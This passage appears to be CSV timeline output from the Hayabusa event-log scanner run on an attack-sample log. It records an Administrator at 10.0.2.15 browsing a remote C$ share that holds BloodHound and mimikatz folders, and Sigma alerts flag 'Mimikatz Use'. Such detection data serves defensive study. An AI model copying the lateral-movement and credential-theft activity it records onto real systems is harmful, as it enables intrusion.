Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff\logs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\desktop.ini : IP Address: 
